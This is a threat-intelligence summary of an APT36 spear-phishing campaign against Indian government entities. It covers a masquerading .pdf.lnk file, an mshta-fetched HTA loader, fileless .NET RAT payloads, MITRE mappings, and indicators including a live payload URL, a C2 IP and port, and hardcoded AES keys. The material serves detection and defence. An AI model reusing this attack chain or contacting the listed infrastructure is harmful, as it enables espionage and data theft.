APT36 : Multi-Stage LNK Malware Campaign Targeting Indian Government Entities

CYFIRMA attributes a targeted multi-stage, fileless espionage campaign to APT36 (Transparent Tribe) that uses weaponized LNK files masquerading as PDFs to deliver HTA loaders and in-memory .NET deserialization payloads. The operation deploys configuration and RAT payloads (ReadOnly/WriteOnly -> ki2mtmkl.dll, iinneldc.dll), adapts persistence based on detected AV products, and maintains encrypted C2 communications to 2.56.10.86 for surveillance and data exfiltration. #APT36 #ReadOnly

Keypoints

APT36 (Transparent Tribe) conducted a spear-phishing campaign delivering a ZIP archive (“Online JLPT Exam Dec 2025.zip”) containing an oversized .pdf.lnk shortcut that embeds full PDF content to masquerade as a legitimate document.
The LNK launches mshta.exe to retrieve and execute a remote HTA loader (https://innlive.in/assets/public/01/jlp/jip.hta) which implements Base64/XOR decryption and in-memory reconstruction of payloads.
Multi-stage, fileless execution: a ReadOnly configuration payload weakens .NET deserialization safeguards (XAML/ObjectDataProvider abuse), and a WriteOnly/fileless DLL (ki2mtmkl.dll → iinneldc.dll) executes entirely in memory as a RAT.
The RAT provides extensive espionage capabilities: system profiling, remote command execution, file enumeration/exfiltration, screen capture, remote desktop, clipboard theft/manipulation, and stored-password harvesting.
Persistence and evasion are AV-aware: the malware profiles installed antivirus products via WMI and selects tailored persistence paths (Startup shortcuts, HTA/batch files, registry changes) to survive in diverse environments.
Command-and-control uses encrypted channels (AES with hardcoded key ZAEDF_98768_@$#%_QCHF) and communicates with C2 at 2.56.10.86:8621 for command retrieval and data exfiltration.
Recommendations include blocking LNK attachments at gateways, enabling full file extension visibility, restricting mshta/PowerShell/HTA usage, deploying EDR/behavioral detection, and integrating IOCs and YARA rules into detection stacks.

MITRE Techniques

[T1566.001 ] Phishing: Spear phishing Attachment – Initial delivery via a malicious ZIP archive containing a deceptive .pdf.lnk attachment (‘the threat actor uses a malicious ZIP archive titled “Online JLPT Exam Dec 2025.zip” as the initial delivery vector’)
[T1059 ] Command and Scripting Interpreter – Abuse of scripting and system interpreters (mshta.exe, PowerShell, cmd.exe) to execute payloads and minimize artifacts (‘Utilizes trusted Windows binaries (mshta.exe, PowerShell, cmd.exe) and in memory execution to minimize on disk artifacts and evade detection’)
[T1059.001 ] Command and Scripting Interpreter: PowerShell – PowerShell used to invoke mshta and execute obfuscated payloads during persistence (‘the payload is then executed using the trusted Windows binary mshta.exe via a PowerShell invocation’)
[T1059.005 ] Command and Scripting Interpreter: Visual Basic – HTA/ActiveX and WScript objects used for environment interaction and execution (‘The HTA leverages ActiveX objects, particularly WScript.Shell, to interact with the Windows environment.’)
[T1218.005 ] System Binary Proxy Execution: Mshta – Execution of remote HTA content via mshta.exe passed as a command-line argument (‘it executes the legitimate Windows utility mshta.exe, passing a remote URL as a command line argument’)
[T1547.001 ] Boot or Logon Autostart Execution: Startup Folder – Malware drops shortcuts and HTA/batch files into the Startup folder to establish persistence (‘establishes persistence by dropping a shortcut file in the user’s Startup folder’)
[T1112 ] Modify Registry – Queries and sets registry/environment variables (COMPLUS_Version) to adjust runtime behavior and as part of persistence fallback (‘it queries registry values to determine the available .NET runtime and dynamically sets the COMPLUS_Version environment variable.’)
[T1055 ] Process Injection – Fileless DLLs are deserialized and executed in memory, avoiding disk artifacts (‘WriteOnly is a fileless DLL payload that is deserialized and executed entirely in memory’)
[T1036 ] Masquerading – Use of double-extension .pdf.lnk and embedded PDF content to impersonate legitimate documents (‘the .lnk file convincingly masquerades as a legitimate PDF document’)
[T1027 ] Obfuscated Files or Information – HTA loader implements custom Base64 and XOR decryption/obfuscation routines to conceal payloads (‘the script then defines several functions … that collectively implement custom Base64 decoding and XOR-based decryption routines’)
[T1070 ] Indicator Removal on Host – In-memory execution and minimized on-disk artifacts reduce forensic traces (‘in memory execution to minimize on disk artifacts and evade detection’)
[T1202 ] Indirect Command Execution – Use of intermediate scripts (batch/HTA/PowerShell) to indirectly execute malicious payloads (‘writes the HTA payload to disk and executes it indirectly through the batch script’)
[T1497 ] Virtualization / Sandbox Evasion – Techniques chosen to reduce detection and sandbox visibility (‘These tactics significantly reduce detection opportunities and enable prolonged, covert access’)
[T1564.001 ] Hide Artifacts: Hidden Files and Directories – Archive contains a hidden usb directory (usbsyn.pim) likely used for runtime data/code (‘the archive also contains a hidden directory named usb, which includes a file named usbsyn.pim’)
[T1555 ] Credentials from Password Stores – Malware harvests stored passwords from the system as part of data collection (‘harvesting stored passwords’)
[T1539 ] Steal Web Session Cookie – Campaign includes web session cookie theft capability as listed in the capability set (‘T1539 Steal Web Session Cookie’)
[T1082 ] System Information Discovery – Malware collects detailed host/system profiling information to fingerprint victims (‘Collects detailed host information, including OS version, username, installed software, and active antivirus products.’)
[T1057 ] Process Discovery – Malware enumerates running processes and can terminate selected processes (‘Lists running processes and terminates selected processes’)
[T1083 ] File and Directory Discovery – Recursive scanning of directories for sensitive documents for exfiltration (‘recursively scanning directories for sensitive document files, including Office documents, PDFs, text files, and database files’)
[T1518.001 ] Software Discovery: Security Software Discovery – Uses WMI to enumerate installed antivirus products and adapt behavior (‘queries the Windows Management Instrumentation (WMI) rootSecurityCenter2 namespace to enumerate installed antivirus products’)
[T1113 ] Screen Capture – Captures screenshots of the victim’s display, resizes/compresses them, and transmits to C2 (‘captures a screenshot of the victim’s primary display using the CopyFromScreen() API … then transmitted to the command-and-control server’)
[T1115 ] Clipboard Data – Functions to read and overwrite clipboard contents for theft and manipulation (‘The getclipboardtext() function enables clipboard data theft … The setclipboardtext() function enables clipboard manipulation’)
[T1005 ] Data from Local System – Systematic collection of local files (Office, PDF, DB files) for exfiltration (‘CopySubfiles function performs systematic data theft by recursively scanning directories for sensitive document files’)
[T1560 ] Archive Collected Data – Collected files are base64-encoded and AES-encrypted before transmission (‘All exfiltrated data is first Base64 encoded and then AES encrypted before transmission’)
[T1071.001 ] Application Layer Protocol: Web – C2 communications performed over application-layer web protocols (‘This function maintains persistent C2 communication with IP 2.56.10.86 on TCP port 8621’ and ‘reads encrypted command data from the attacker-controlled server’)
[T1095 ] Non-Application Layer Protocol – Use of non-application-layer transport methods for C2 as enumerated in the ATT&CK mapping (‘T1095 Non-Application Layer Protocol’)
[T1573 ] Encrypted Channel – Encrypted C2 channel using AES and hardcoded keys for confidentiality (‘the received data is decrypted using AES with a hardcoded key (“ZAEDF_98768_@$#%_QCHF”)’)
[T1105 ] Ingress Tool Transfer – HTA and DLL payloads retrieved from remote URLs during initial stages (‘HTA source: https://innlive.in/assets/public/01/jlp/jip.hta’)
[T1041 ] Exfiltration Over C2 Channel – Data exfiltration performed over the established C2 channel to the attacker server (‘All exfiltrated data is first Base64 encoded and then AES encrypted before transmission … Send() handles final delivery to the attacker controlled command and control server’)
[T1565.001 ] Data Manipulation: Stored Data – Malware can manipulate stored data and clipboard contents as part of its capabilities (‘Data Manipulation: Stored Data’ capability and clipboard overwrite functions)

Indicators of Compromise

[SHA-256 Hash ] Malware component hashes observed – 06fb22c743fcc949998e280bd5deaf8f80d616b371576b5e11fd5b1d3b23a5f2, c1f3dea00caec58c9e0f990366ff40ae59e93f666f92e1c218c03478bf3abe17, and 1 other hash
[MD5 Hash ] Reported MD5s for distributed archive and components – Online 20JLPT 20Exam 20Dec 202025.zip: 30fda797535a0f367ea2809426760020, Online JLPT Exam Dec 2025.pdf.lnk: ceb715db684199958aa5e6c05dc5c7f0 (and other MD5s listed)
[File Name ] Malicious file names and payloads used in the campaign – Online JLPT Exam Dec 2025.pdf.lnk (weaponized shortcut), jip.hta (HTA loader), ki2mtmkl.dll and iinneldc.dll (in-memory RAT payloads)
[Domain ] Hosting and resource domains used for payloads/icons – innlive.in (HTA hosting: https://innlive.in/assets/public/01/jlp/jip.hta), drjagrutichavan.com (remote icon resource)
[IP Address ] Command-and-control server – 2.56.10.86 (C2 on TCP port 8621)
[YARA / Hardcoded Keys ] Embedded configuration/crypto strings and YARA-detectable keys – ZAEDF_98768_@$#%_QCHF, NMSOW_$^*$_68923_MOXOE (present in YARA rule and code)

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print